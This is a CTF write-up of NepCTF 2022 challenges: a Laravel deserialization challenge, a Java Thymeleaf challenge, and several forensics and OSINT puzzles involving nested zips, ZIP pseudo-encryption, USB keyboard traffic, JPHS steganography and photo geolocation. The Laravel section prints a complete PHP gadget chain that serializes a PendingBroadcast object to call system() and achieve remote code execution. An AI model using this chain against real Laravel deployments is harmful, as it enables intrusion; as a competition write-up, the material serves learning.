[NepCTF2022] Reproduction
2022-07-21 00:08:00 【ThnPkm】
Just Kidding
Naughty HRP wrote a project with Laravel to welcome everyone to play NepCTF 2nd, little did he think … unexpectedly, it was taken down by the bad guy Sharun (pout)
The source code leaks through www.zip. I didn't understand anything and didn't pay attention to where the right entry point was; I kept focusing on web.php.
I didn't notice the path of the class imported with use here. Following that path leads to the deserialization entry point.
At the time of writing, the version was exactly 9.12.2, and the 9.1.8 chain circulating online also works against it.
At that time, I just didn't find the right entry point and path.
https://github.com/1nhann/vulns/issues
pop1, direct RCE
<?php
namespace Illuminate\Contracts\Queue{
    interface ShouldQueue
    {
        //
    }
}
namespace Illuminate\Bus{
    class Dispatcher{
        protected $container;
        protected $pipeline;
        protected $pipes = [];
        protected $handlers = [];
        protected $queueResolver;
        function __construct()
        {
            $this->queueResolver = "system";
        }
    }
}
namespace Illuminate\Broadcasting{
    use Illuminate\Contracts\Queue\ShouldQueue;
    class BroadcastEvent implements ShouldQueue {
        function __construct()
        {
        }
    }
    class PendingBroadcast{
        protected $events;
        protected $event;
        function __construct()
        {
            $this->event = new BroadcastEvent();
            $this->event->connection = "ls /";
            $this->events = new \Illuminate\Bus\Dispatcher();
        }
    }
}
namespace{
    $a = new \Illuminate\Broadcasting\PendingBroadcast();
    echo base64_encode(serialize($a));
}
Pay attention to the route the payload is sent to. After uploading it, view the page source to see the echoed output of the successful RCE.
Challenger
Naughty HRP used another language to write a project to welcome you, and didn't expect Sharun to dig into it.
It is a Java framework. A jar is given, so decompile it.
I haven't learned Java, so I followed the write-up to go through it. It is also solved with a chain found online.
Java Security: Thymeleaf Template Injection Analysis - nice_0e3 - Blog Garden
Sign-in challenge
Use binwalk to separate the data from the picture.
This yields a nesting doll of compressed archives.
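import zipfile

# Walk the nested archives from 232.zip down to 3.zip,
# extracting each one into the current directory.
for i in range(232, 2, -1):
    a = str(i) + ".zip"
    print(a)
    with zipfile.ZipFile(a) as zf:
        zf.extractall()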
The extraction script is from brother Peng. It decompresses all the way to the end.
I was originally going to brute-force the password, but in fact it is pseudo-encryption.
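Pseudo-encryption means bit 0 ("encrypted") of the general-purpose flag word is set in the ZIP headers while the data itself is not encrypted, so no password exists to find. The following is an added example, not part of the original post: it checks an archive for that condition by clearing the bit and verifying the CRCs. It assumes a non-ZIP64 archive, uses a constructed in-memory sample, and all function names are illustrative.

```python
import io
import struct
import zipfile
import zlib


def patch_encrypted_bit(data, encrypted):
    """Set or clear flag bit 0 ("encrypted") in every central and local header."""
    buf = bytearray(data)
    eocd = buf.rfind(b"PK\x05\x06")  # end-of-central-directory record
    count, _size, pos = struct.unpack_from("<HII", buf, eocd + 10)
    for _ in range(count):
        name_len, extra_len, comment_len = struct.unpack_from("<HHH", buf, pos + 28)
        (local,) = struct.unpack_from("<I", buf, pos + 42)
        for off in (pos + 8, local + 6):  # flag word: central header, local header
            (flags,) = struct.unpack_from("<H", buf, off)
            flags = (flags | 1) if encrypted else (flags & 0xFFFE)
            struct.pack_into("<H", buf, off, flags)
        pos += 46 + name_len + extra_len + comment_len
    return bytes(buf)


def flagged_entries(data):
    """Names of entries whose central directory claims they are encrypted."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return [zi.filename for zi in zf.infolist() if zi.flag_bits & 0x1]


def is_pseudo_encrypted(data):
    """True if entries are flagged encrypted yet pass CRC once the flag is cleared."""
    if not flagged_entries(data):
        return False
    try:
        with zipfile.ZipFile(io.BytesIO(patch_encrypted_bit(data, False))) as zf:
            return zf.testzip() is None  # None means every CRC matched
    except (zipfile.BadZipFile, zlib.error, EOFError):
        return False  # contents are real ciphertext


def make_sample():
    """Constructed sample: an ordinary archive with only the flag bit switched on."""
    raw = io.BytesIO()
    with zipfile.ZipFile(raw, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("flag.txt", "constructed sample contents\n")
    return patch_encrypted_bit(raw.getvalue(), True)


if __name__ == "__main__":
    sample = make_sample()
    print(flagged_entries(sample), is_pseudo_encrypted(sample))
```

Running `patch_encrypted_bit(data, False)` on a pseudo-encrypted archive returns bytes that any standard extractor opens without a password.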
Look at the file name and you know it's keyboard traffic.
Wang Yihang's USB script solves it in one go.
rare base
The only attachment is a jpg. I tried it, found no information and put it down. I didn't expect it to be a sign-in level challenge.
I rarely use the JPHS tool and had forgotten about it. With no password, a direct seek brings the data out.
Then base58.
Huahua painting Huahua
After downloading, the attachment has an osz suffix. Looking at it in 010, the header is that of a compressed archive, so just change the suffix ....
The correct way to open an osz file
Open it with osu, which is a music game.
Pie ? trap !
There is a license plate in the lower right corner reading 琼 (Qiong), which I didn't find when I was solving it. Locating Shangdeyuan tea in Sanya, it happened to be here.
In the upper left corner is the bank.